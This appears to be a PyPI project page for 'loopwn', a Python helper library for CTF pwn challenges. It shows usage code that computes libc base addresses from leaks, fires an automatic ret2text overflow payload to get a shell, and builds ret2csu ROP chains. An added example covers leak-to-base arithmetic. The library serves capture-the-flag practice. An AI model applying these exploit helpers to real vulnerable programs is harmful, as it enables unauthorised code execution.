A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
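The arithmetic behind a leak-based base calculation, with the sanity checks worth running on the result, as an added example that is not loopwn's own code. The offset table is constructed (chosen so that the leaked puts value above maps to the base address above), and the names base_from_leak, base_from_leaks, resolve and LeakMismatch are hypothetical.

```python
PAGE_SIZE = 0x1000                   # ASLR slides mappings in whole pages
USER_TOP = 0x0000_7FFF_FFFF_FFFF     # top of x86-64 user address space

# Constructed offsets for illustration; a real tool reads them from libc.so.6.
OFFSETS = {"puts": 0x7F5A0, "system": 0x4F440, "printf": 0x64E80}


class LeakMismatch(ValueError):
    """Leaked address is inconsistent with the assumed libc build."""


def base_from_leak(offsets, symbol, leaked):
    """Return the load base implied by one leaked symbol address."""
    if not 0 < leaked <= USER_TOP:
        raise LeakMismatch(f"{leaked:#x} is not a user-space address")
    base = leaked - offsets[symbol]
    # The low 12 bits of a symbol address survive ASLR, so a base that is
    # not page-aligned means the wrong libc, wrong symbol, or a truncated leak.
    if base <= 0 or base % PAGE_SIZE:
        raise LeakMismatch(f"base {base:#x} from {symbol} is not page-aligned")
    return base


def base_from_leaks(offsets, leaks):
    """Cross-check several leaks; all must imply the same base."""
    bases = {base_from_leak(offsets, s, a) for s, a in leaks.items()}
    if len(bases) != 1:
        raise LeakMismatch("leaks disagree: " + ", ".join(map(hex, sorted(bases))))
    return bases.pop()


def resolve(offsets, base, symbol):
    """Runtime address of a symbol once the base is known."""
    return base + offsets[symbol]


if __name__ == "__main__":
    base = base_from_leak(OFFSETS, "puts", 0x7FFFF7A8C5A0)
    print(hex(base), hex(resolve(OFFSETS, base, "system")))
    try:
        base_from_leak(OFFSETS, "puts", 0x7FFFF7A8C5B0)  # low bits off by 0x10
    except LeakMismatch as exc:
        print("rejected:", exc)
```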
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
    csu_end, csu_start,
    r12=0x601018,  # Function pointer (e.g., GOT address)
    r13=0,         # Arg1 (EDI)
    r14=1,         # Arg2 (RSI)
    r15=2,         # Arg3 (RDX)
    return_addr=0x401120,
    padding=0x20
)
# Send payload (io is the pwntools tube opened in the loop2text example)
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get system and /bin/sh addresses via properties.
- Auto Ret2Text: Generate payload and get shell in one line with loop2text.
- Auto Ret2CSU: Simplify Ret2CSU payload construction with loopcsu.
- Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from pwntools's ELF class.
Download files
Source Distribution
loopwn-0.3.10.tar.gz (9.0 kB)
Built Distribution
File details
Details for the file loopwn-0.3.10.tar.gz.
File metadata
- Download URL: loopwn-0.3.10.tar.gz
- Upload date:
- Size: 9.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | c0e17bf6f22c7e0a8c0e6663275e11337ac2a023b6906755a407e4af87babffb |
| MD5 | 5896ca13e829cef2bfdfc9449b1441e7 |
| BLAKE2b-256 | 11d9fb48e7e09325ff78450d4bbf19f01db766700c7d63c6e497b89ce3985ffd |
File details
Details for the file loopwn-0.3.10-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.10-py3-none-any.whl
- Upload date:
- Size: 9.6 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | ad0d56d4098bf299c57a28064e87d6e34aa6b96d3a58d2d3fbf49392e5114713 |
| MD5 | a20cd2473796ed182094d8542da5e472 |
| BLAKE2b-256 | c3111812d28f66ecf4f68c49f61c1e880f8436623968f661f9e3dc6abefab987 |